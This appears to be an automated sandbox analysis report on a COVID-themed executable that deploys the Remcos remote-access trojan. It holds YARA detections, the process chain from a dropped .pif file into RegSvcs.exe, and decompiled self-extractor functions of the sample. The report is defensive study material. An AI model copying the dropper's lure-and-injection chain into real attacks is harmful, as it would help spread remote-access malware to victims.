                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.388273489.00000000048C8000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.386594878.00000000049B1000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.386755735.0000000004971000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.386645318.00000000048A9000.00000004.00000001.sdmp, Author: Joe Security
                                          Antivirus matches:
                                          • Detection: 55%, Virustotal, Browse
                                          • Detection: 31%, Metadefender, Browse
                                          • Detection: 50%, ReversingLabs
                                          Reputation:low

                                          Chronological Activities

                                          Analysis Process: RegSvcs.exe PID: 6824 Parent PID: 6624

                                          General

                                          Start time:15:30:41
                                          Start date:07/09/2021
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Imagebase:0xfe0000
                                          File size:45152 bytes
                                          MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.614438289.0000000003630000.00000004.00000040.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Remcos_1, Description: Remcos Payload, Source: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Author: kevoreilly
                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Author: unknown
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: xdhqeufpq.pif PID: 6992 Parent PID: 3440

                                          General

                                          Start time:15:30:48
                                          Start date:07/09/2021
                                          Path:C:\84086963\xdhqeufpq.pif
                                          Wow64 process (32bit):true
                                          Commandline:'C:\84086963\XDHQEU~1.PIF' c:\84086963\fqficjon.emu
                                          Imagebase:0x12f0000
                                          File size:661744 bytes
                                          MD5 hash:957FCFF5374F7A5EE128D32C976ADAA5
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.418699902.0000000001867000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.418686304.0000000004D51000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.421704593.0000000004D51000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.421834849.0000000001867000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.421773839.0000000004D70000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.418832919.0000000004D91000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.421808057.0000000004D11000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.421744141.0000000004D31000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.418729526.0000000004D11000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.418713297.0000000004D31000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.417154110.0000000004D11000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.421731075.000000000188B000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.421790934.0000000004D70000.00000004.00000001.sdmp, Author: Joe Security
                                          Reputation:low

                                          Chronological Activities

                                          Analysis Process: RegSvcs.exe PID: 5084 Parent PID: 6992

                                          General

                                          Start time:15:30:56
                                          Start date:07/09/2021
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Imagebase:0x690000
                                          File size:45152 bytes
                                          MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.422168272.0000000002FA0000.00000004.00000040.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.422028916.0000000000B00000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Remcos_1, Description: Remcos Payload, Source: 0000000C.00000002.422028916.0000000000B00000.00000040.00000001.sdmp, Author: kevoreilly
                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.422028916.0000000000B00000.00000040.00000001.sdmp, Author: unknown
                                          Reputation:high

                                          Chronological Activities

                                          Disassembly

                                          Code Analysis

                                          Reset < >

                                            Analysis Process: Covid-19 Data Report Google Checklist.exe PID: 6380 Parent PID: 6128 Covid-19 Data Report Google Checklist.exeCOMMON

                                            Executed Functions

                                            Function 00C4CBB8, Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 199filesleeptimeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 17%
                                            			E00C4CBB8(void* __edx, void* __ebp, void* __eflags, void* __fp0, void* _a92, void* _a94, void* _a98, void* _a100, void* _a102, void* _a104, void* _a106, void* _a108, void* _a112, void* _a152, void* _a156, void* _a204) {
				char _v208;
				void* __ebx;
				void* __edi;
				void* _t41;
				long _t51;
				void* _t54;
				intOrPtr _t58;
				struct HWND__* _t74;
				void* _t75;
				WCHAR* _t95;
				struct HINSTANCE__* _t97;
				intOrPtr _t99;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t125;

				_t125 = __fp0;
				_t89 = __edx;
				E00C3FD49(__edx, 1);
				E00C495F8("C:\Users\engineer\Desktop", 0x800);
				E00C49AA0( &_v208); // executed
				E00C41017(0xc77370);
				_t74 = 0;
				E00C4E920(0x7104, 0xc85d08, 0, 0x7104);
				_t106 = _t105 + 0xc;
				_t95 = GetCommandLineW();
				_t110 = _t95;
				if(_t95 != 0) {
					_push(_t95);
					E00C4B356(0, _t110);
					if( *0xc79601 == 0) {
						E00C4C891(__eflags, _t95); // executed
					} else {
						_t103 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
						if(_t103 != 0) {
							UnmapViewOfFile(_t75);
							_t74 = 0;
						}
						CloseHandle(_t103);
					}
				}
				GetModuleFileNameW(_t74, 0xc8ce18, 0x800);
				SetEnvironmentVariableW(L"sfxname", 0xc8ce18); // executed
				GetLocalTime(_t106 + 0xc);
				_push( *(_t106 + 0x1a) & 0x0000ffff);
				_push( *(_t106 + 0x1c) & 0x0000ffff);
				_push( *(_t106 + 0x1e) & 0x0000ffff);
				_push( *(_t106 + 0x20) & 0x0000ffff);
				_push( *(_t106 + 0x22) & 0x0000ffff);
				_push( *(_t106 + 0x22) & 0x0000ffff);
				E00C33E41(_t106 + 0x9c, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d",  *(_t106 + 0x24) & 0x0000ffff);
				_t107 = _t106 + 0x28;
				SetEnvironmentVariableW(L"sfxstime", _t107 + 0x7c);
				_t97 = GetModuleHandleW(_t74);
				 *0xc70064 = _t97;
				 *0xc70060 = _t97; // executed
				_t41 = LoadIconW(_t97, 0x64); // executed
				 *0xc7b704 = _t41;
				 *0xc85d04 = E00C4A4F8(_t89, _t125);
				E00C3CFAB(0xc70078, _t89, 0xc8ce18);
				E00C483FC(0);
				E00C483FC(0);
				 *0xc775e8 = _t107 + 0x5c;
				 *0xc775ec = _t107 + 0x30; // executed
				DialogBoxParamW(_t97, L"STARTDLG", _t74, E00C4A5D1, _t74); // executed
				 *0xc775ec = _t74;
				 *0xc775e8 = _t74;
				E00C484AE(_t107 + 0x24);
				E00C484AE(_t107 + 0x50);
				_t51 =  *0xc8de28;
				if(_t51 != 0) {
					Sleep(_t51);
				}
				if( *0xc785f8 != 0) {
					E00C49CA1(0xc8ce18);
				}
				E00C3E797(0xc85c00);
				if( *0xc775e4 > 0) {
					L00C52B4E( *0xc775e0);
				}
				DeleteObject( *0xc7b704);
				_t54 =  *0xc85d04;
				if(_t54 != 0) {
					DeleteObject(_t54);
				}
				if( *0xc700e0 == 0 &&  *0xc775d7 != 0) {
					E00C36E03(0xc700e0, 0xff);
				}
				_t55 =  *0xc8de2c;
				 *0xc775d7 = 1;
				if( *0xc8de2c != 0) {
					E00C4C8F0(_t55);
					CloseHandle( *0xc8de2c);
				}
				_t99 =  *0xc700e0; // 0x0
				if( *0xc8de21 != 0) {
					_t58 =  *0xc6d5fc; // 0x3e8
					if( *0xc8de22 == 0) {
						__eflags = _t58;
						if(_t58 < 0) {
							_t99 = _t99 - _t58;
							__eflags = _t99;
						}
					} else {
						_t99 =  *0xc8de24;
						if(_t58 > 0) {
							_t99 = _t99 + _t58;
						}
					}
				}
				E00C49B08(_t107 + 0x1c); // executed
				return _t99;
			}




















                                            0x00c4cbb8
                                            0x00c4cbb8
                                            0x00c4cbc3
                                            0x00c4cbd2
                                            0x00c4cbdb
                                            0x00c4cbe5
                                            0x00c4cbef
                                            0x00c4cbf8
                                            0x00c4cbfd
                                            0x00c4cc06
                                            0x00c4cc08
                                            0x00c4cc0a
                                            0x00c4cc0c
                                            0x00c4cc0d
                                            0x00c4cc18
                                            0x00c4cc85
                                            0x00c4cc1a
                                            0x00c4cc2d
                                            0x00c4cc31
                                            0x00c4cc72
                                            0x00c4cc78
                                            0x00c4cc78
                                            0x00c4cc7b
                                            0x00c4cc81
                                            0x00c4cc18
                                            0x00c4cc96
                                            0x00c4cca8
                                            0x00c4ccaf
                                            0x00c4ccba
                                            0x00c4ccc0
                                            0x00c4ccc6
                                            0x00c4cccc
                                            0x00c4ccd2
                                            0x00c4ccd8
                                            0x00c4ccee
                                            0x00c4ccf3
                                            0x00c4cd00
                                            0x00c4cd09
                                            0x00c4cd0e
                                            0x00c4cd14
                                            0x00c4cd1a
                                            0x00c4cd20
                                            0x00c4cd30
                                            0x00c4cd35
                                            0x00c4cd3e
                                            0x00c4cd47
                                            0x00c4cd57
                                            0x00c4cd66
                                            0x00c4cd6b
                                            0x00c4cd75
                                            0x00c4cd7b
                                            0x00c4cd81
                                            0x00c4cd8a
                                            0x00c4cd8f
                                            0x00c4cd96
                                            0x00c4cd99
                                            0x00c4cd99
                                            0x00c4cda6
                                            0x00c4cda8
                                            0x00c4cda8
                                            0x00c4cdb2
                                            0x00c4cdbe
                                            0x00c4cdc6
                                            0x00c4cdcb
                                            0x00c4cdd8
                                            0x00c4cdda
                                            0x00c4cde1
                                            0x00c4cde4
                                            0x00c4cde4
                                            0x00c4cded
                                            0x00c4ce02
                                            0x00c4ce02
                                            0x00c4ce07
                                            0x00c4ce0c
                                            0x00c4ce15
                                            0x00c4ce18
                                            0x00c4ce23
                                            0x00c4ce23
                                            0x00c4ce30
                                            0x00c4ce36
                                            0x00c4ce3f
                                            0x00c4ce44
                                            0x00c4ce54
                                            0x00c4ce56
                                            0x00c4ce58
                                            0x00c4ce58
                                            0x00c4ce58
                                            0x00c4ce46
                                            0x00c4ce46
                                            0x00c4ce4e
                                            0x00c4ce50
                                            0x00c4ce50
                                            0x00c4ce4e
                                            0x00c4ce44
                                            0x00c4ce5e
                                            0x00c4ce6e

                                            APIs
                                              • Part of subcall function 00C3FD49: GetModuleHandleW.KERNEL32 ref: 00C3FD61
                                              • Part of subcall function 00C3FD49: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00C3FD79
                                              • Part of subcall function 00C3FD49: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00C3FD9C
                                              • Part of subcall function 00C495F8: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00C49600
                                              • Part of subcall function 00C49AA0: OleInitialize.OLE32(00000000), ref: 00C49AB9
                                              • Part of subcall function 00C49AA0: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00C49AF0
                                              • Part of subcall function 00C49AA0: SHGetMalloc.SHELL32(00C775C0), ref: 00C49AFA
                                              • Part of subcall function 00C41017: GetCPInfo.KERNEL32(00000000,?), ref: 00C41028
                                              • Part of subcall function 00C41017: IsDBCSLeadByte.KERNEL32(00000000), ref: 00C4103C
                                            • GetCommandLineW.KERNEL32 ref: 00C4CC00
                                            • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00C4CC27
                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00C4CC38
                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 00C4CC72
                                              • Part of subcall function 00C4C891: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00C4C8A7
                                              • Part of subcall function 00C4C891: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00C4C8E3
                                            • CloseHandle.KERNEL32(00000000), ref: 00C4CC7B
                                            • GetModuleFileNameW.KERNEL32(00000000,00C8CE18,00000800), ref: 00C4CC96
                                            • SetEnvironmentVariableW.KERNELBASE(sfxname,00C8CE18), ref: 00C4CCA8
                                            • GetLocalTime.KERNEL32(?), ref: 00C4CCAF
                                            • _swprintf.LIBCMT ref: 00C4CCEE
                                            • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00C4CD00
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00C4CD03
                                            • LoadIconW.USER32(00000000,00000064), ref: 00C4CD1A
                                            • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001A5D1,00000000), ref: 00C4CD6B
                                            • Sleep.KERNEL32(?), ref: 00C4CD99
                                            • DeleteObject.GDI32 ref: 00C4CDD8
                                            • DeleteObject.GDI32(?), ref: 00C4CDE4
                                            • CloseHandle.KERNEL32 ref: 00C4CE23
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                            • API String ID: 788466649-277078469
                                            • Opcode ID: e8852be88fcfae18dcde536eb38c92df4dab7e20c40c001c7fd15c951127a0b7
                                            • Instruction ID: cd9d1dd97ffaf0acdc57effe600dee07ced3f2e36750e9381c83bcc4f6a34f5d
                                            • Opcode Fuzzy Hash: e8852be88fcfae18dcde536eb38c92df4dab7e20c40c001c7fd15c951127a0b7
                                            • Instruction Fuzzy Hash: 4961E571905354ABD760AB75ECC9F2F3BACFB49710F000439F94AA61A1DBB48D44DBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4963A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 92memorywindowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 67%
                                            			E00C4963A(WCHAR* _a4) {
				WCHAR* _v4;
				intOrPtr _v8;
				intOrPtr* _v16;
				char _v20;
				void* __ecx;
				struct HRSRC__* _t14;
				WCHAR* _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				intOrPtr* _t26;
				char* _t30;
				long _t32;
				void* _t34;
				intOrPtr* _t35;
				void* _t40;
				struct HRSRC__* _t42;
				intOrPtr* _t44;

				_t14 = FindResourceW( *0xc70060, _a4, "PNG");
				_t42 = _t14;
				if(_t42 == 0) {
					return _t14;
				}
				_t32 = SizeofResource( *0xc70060, _t42);
				if(_t32 == 0) {
					L4:
					_t16 = 0;
					L16:
					return _t16;
				}
				_t17 = LoadResource( *0xc70060, _t42);
				if(_t17 == 0) {
					goto L4;
				}
				_t18 = LockResource(_t17);
				_t43 = _t18;
				if(_t18 != 0) {
					_v4 = 0;
					_t19 = GlobalAlloc(2, _t32); // executed
					_t40 = _t19;
					if(_t40 == 0) {
						L15:
						_t16 = _v4;
						goto L16;
					}
					if(GlobalLock(_t40) == 0) {
						L14:
						GlobalFree(_t40);
						goto L15;
					}
					E00C4EA80(_t20, _t43, _t32);
					_a4 = 0;
					_push( &_a4);
					_push(0);
					_push(_t40);
					if( *0xc6dff8() == 0) {
						_t26 = E00C495CF(_t24, _t34, _v8, 0); // executed
						_t35 = _v16;
						_t44 = _t26;
						 *((intOrPtr*)( *_t35 + 8))(_t35);
						if(_t44 != 0) {
							 *((intOrPtr*)(_t44 + 8)) = 0;
							if( *((intOrPtr*)(_t44 + 8)) == 0) {
								_push(0xffffff);
								_t30 =  &_v20;
								_push(_t30);
								_push( *((intOrPtr*)(_t44 + 4)));
								L00C4D81A(); // executed
								if(_t30 != 0) {
									 *((intOrPtr*)(_t44 + 8)) = _t30;
								}
							}
							 *((intOrPtr*)( *_t44))(1);
						}
					}
					GlobalUnlock(_t40);
					goto L14;
				}
				goto L4;
			}





















                                            0x00c4964b
                                            0x00c49651
                                            0x00c49655
                                            0x00c49732
                                            0x00c49732
                                            0x00c49669
                                            0x00c4966d
                                            0x00c4968d
                                            0x00c4968d
                                            0x00c4972f
                                            0x00000000
                                            0x00c4972f
                                            0x00c49676
                                            0x00c4967e
                                            0x00000000
                                            0x00000000
                                            0x00c49681
                                            0x00c49687
                                            0x00c4968b
                                            0x00c4969b
                                            0x00c4969f
                                            0x00c496a5
                                            0x00c496a9
                                            0x00c49729
                                            0x00c49729
                                            0x00000000
                                            0x00c4972e
                                            0x00c496b4
                                            0x00c49722
                                            0x00c49723
                                            0x00000000
                                            0x00c49723
                                            0x00c496b9
                                            0x00c496c1
                                            0x00c496c9
                                            0x00c496ca
                                            0x00c496cb
                                            0x00c496d4
                                            0x00c496db
                                            0x00c496e0
                                            0x00c496e4
                                            0x00c496e9
                                            0x00c496ee
                                            0x00c496f3
                                            0x00c496f8
                                            0x00c496fa
                                            0x00c496ff
                                            0x00c49703
                                            0x00c49704
                                            0x00c49707
                                            0x00c4970e
                                            0x00c49710
                                            0x00c49710
                                            0x00c4970e
                                            0x00c49719
                                            0x00c49719
                                            0x00c496ee
                                            0x00c4971c
                                            0x00000000
                                            0x00c4971c
                                            0x00000000

                                            APIs
                                            • FindResourceW.KERNEL32(00000066,PNG,?,?,00C4A54A,00000066), ref: 00C4964B
                                            • SizeofResource.KERNEL32(00000000,74855B70,?,?,00C4A54A,00000066), ref: 00C49663
                                            • LoadResource.KERNEL32(00000000,?,?,00C4A54A,00000066), ref: 00C49676
                                            • LockResource.KERNEL32(00000000,?,?,00C4A54A,00000066), ref: 00C49681
                                            • GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,00C4A54A,00000066), ref: 00C4969F
                                            • GlobalLock.KERNEL32 ref: 00C496AC
                                            • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00C49707
                                            • GlobalUnlock.KERNEL32(00000000), ref: 00C4971C
                                            • GlobalFree.KERNEL32 ref: 00C49723
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                                            • String ID: PNG
                                            • API String ID: 4097654274-364855578
                                            • Opcode ID: f338beb4f3c3aaebdc8ed8381e029fbd3b992b71fed4b8980fb5a8b8e69db793
                                            • Instruction ID: 2b07c960cbb4fadeff68cebd4d48b253d5d387630d0b2ac505f5ebea76518511
                                            • Opcode Fuzzy Hash: f338beb4f3c3aaebdc8ed8381e029fbd3b992b71fed4b8980fb5a8b8e69db793
                                            • Instruction Fuzzy Hash: EC218B71615622ABC7319F22DC88F2FBBB9FF85790B150528FA56C2260DB71CC40DBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C3A2DF, Relevance: 7.6, APIs: 5, Instructions: 108fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 80%
                                            			E00C3A2DF(void* __edx, intOrPtr _a4, intOrPtr _a8, char _a32, short _a592, void* _a4692, WCHAR* _a4696, intOrPtr _a4700) {
				struct _WIN32_FIND_DATAW _v0;
				char _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _t43;
				signed int _t49;
				signed int _t63;
				void* _t65;
				long _t68;
				char _t69;
				void* _t73;
				void* _t82;
				intOrPtr _t84;
				void* _t87;
				signed int _t89;
				void* _t90;

				_t82 = __edx;
				E00C4D940();
				_push(_t89);
				_t87 = _a4692;
				_t84 = _a4700;
				_t90 = _t89 | 0xffffffff;
				_push( &_v0);
				if(_t87 != _t90) {
					_t43 = FindNextFileW(_t87, ??);
					__eflags = _t43;
					if(_t43 == 0) {
						_t87 = _t90;
						_t63 = GetLastError();
						__eflags = _t63 - 0x12;
						_t11 = _t63 != 0x12;
						__eflags = _t11;
						 *((char*)(_t84 + 0x1044)) = _t63 & 0xffffff00 | _t11;
					}
					__eflags = _t87 - _t90;
					if(_t87 != _t90) {
						goto L13;
					}
				} else {
					_t65 = FindFirstFileW(_a4696, ??); // executed
					_t87 = _t65;
					if(_t87 != _t90) {
						L13:
						E00C3FAB1(_t84, _a4696, 0x800);
						_push(0x800);
						E00C3B9B9(__eflags, _t84,  &_a32);
						_t49 = 0 + _a8;
						__eflags = _t49;
						 *(_t84 + 0x1000) = _t49;
						asm("adc ecx, 0x0");
						 *((intOrPtr*)(_t84 + 0x1008)) = _v24;
						 *((intOrPtr*)(_t84 + 0x1028)) = _v20;
						 *((intOrPtr*)(_t84 + 0x102c)) = _v16;
						 *((intOrPtr*)(_t84 + 0x1030)) = _v12;
						 *((intOrPtr*)(_t84 + 0x1034)) = _v8;
						 *((intOrPtr*)(_t84 + 0x1038)) = _v4;
						 *(_t84 + 0x103c) = _v0.dwFileAttributes;
						 *((intOrPtr*)(_t84 + 0x1004)) = _a4;
						E00C40A81(_t84 + 0x1010, _t82,  &_v4);
						E00C40A81(_t84 + 0x1018, _t82,  &_v24);
						E00C40A81(_t84 + 0x1020, _t82,  &_v20);
					} else {
						if(E00C3B32C(_a4696,  &_a592, 0x800) == 0) {
							L4:
							_t68 = GetLastError();
							if(_t68 == 2 || _t68 == 3 || _t68 == 0x12) {
								_t69 = 0;
								__eflags = 0;
							} else {
								_t69 = 1;
							}
							 *((char*)(_t84 + 0x1044)) = _t69;
						} else {
							_t73 = FindFirstFileW( &_a592,  &_v0); // executed
							_t87 = _t73;
							if(_t87 != _t90) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t84 + 0x1040) =  *(_t84 + 0x1040) & 0x00000000;
				return _t87;
			}






















                                            0x00c3a2df
                                            0x00c3a2e4
                                            0x00c3a2ea
                                            0x00c3a2ec
                                            0x00c3a2f8
                                            0x00c3a2ff
                                            0x00c3a302
                                            0x00c3a305
                                            0x00c3a37a
                                            0x00c3a380
                                            0x00c3a382
                                            0x00c3a384
                                            0x00c3a386
                                            0x00c3a38c
                                            0x00c3a38f
                                            0x00c3a38f
                                            0x00c3a392
                                            0x00c3a392
                                            0x00c3a398
                                            0x00c3a39a
                                            0x00000000
                                            0x00000000
                                            0x00c3a307
                                            0x00c3a314
                                            0x00c3a316
                                            0x00c3a31a
                                            0x00c3a3a0
                                            0x00c3a3ae
                                            0x00c3a3b3
                                            0x00c3a3ba
                                            0x00c3a3c5
                                            0x00c3a3c5
                                            0x00c3a3c9
                                            0x00c3a3d3
                                            0x00c3a3d6
                                            0x00c3a3e0
                                            0x00c3a3ea
                                            0x00c3a3f4
                                            0x00c3a3fe
                                            0x00c3a408
                                            0x00c3a412
                                            0x00c3a41c
                                            0x00c3a429
                                            0x00c3a439
                                            0x00c3a449
                                            0x00c3a320
                                            0x00c3a33b
                                            0x00c3a352
                                            0x00c3a352
                                            0x00c3a35b
                                            0x00c3a36c
                                            0x00c3a36c
                                            0x00c3a367
                                            0x00c3a369
                                            0x00c3a369
                                            0x00c3a36e
                                            0x00c3a33d
                                            0x00c3a34a
                                            0x00c3a34c
                                            0x00c3a350
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c3a350
                                            0x00c3a33b
                                            0x00c3a31a
                                            0x00c3a44e
                                            0x00c3a461

                                            APIs
                                            • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00C3A1DA,000000FF,?,?), ref: 00C3A314
                                            • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00C3A1DA,000000FF,?,?), ref: 00C3A34A
                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00C3A1DA,000000FF,?,?), ref: 00C3A352
                                            • FindNextFileW.KERNEL32(?,?,?,?,?,?,00C3A1DA,000000FF,?,?), ref: 00C3A37A
                                            • GetLastError.KERNEL32(?,?,?,?,00C3A1DA,000000FF,?,?), ref: 00C3A386
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileFind$ErrorFirstLast$Next
                                            • String ID:
                                            • API String ID: 869497890-0
                                            • Opcode ID: 92800860270065c5cc9a8d6b0c67abce1d99f437d9d47eb4ae593c33a21a1a37
                                            • Instruction ID: 807ae39630871e710163268b3ab45ffb25f4fe5705631d8925a3320067daa5b1
                                            • Opcode Fuzzy Hash: 92800860270065c5cc9a8d6b0c67abce1d99f437d9d47eb4ae593c33a21a1a37
                                            • Instruction Fuzzy Hash: 12416372614741AFC364DF64C884ADEF7E8BB88350F000A1AF5E9D3250D774E9649B92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C56AF3, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C56AF3(int _a4) {
				void* _t14;
				void* _t16;

				if(E00C59D6E(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00C56B78(_t14, _t16, _a4);
				ExitProcess(_a4);
			}





                                            0x00c56aff
                                            0x00c56b1b
                                            0x00c56b1b
                                            0x00c56b24
                                            0x00c56b2d

                                            APIs
                                            • GetCurrentProcess.KERNEL32(00000003,?,00C56AC9,00000003,00C6A800,0000000C,00C56C20,00000003,00000002,00000000,?,00C57B1A,00000003), ref: 00C56B14
                                            • TerminateProcess.KERNEL32(00000000,?,00C56AC9,00000003,00C6A800,0000000C,00C56C20,00000003,00000002,00000000,?,00C57B1A,00000003), ref: 00C56B1B
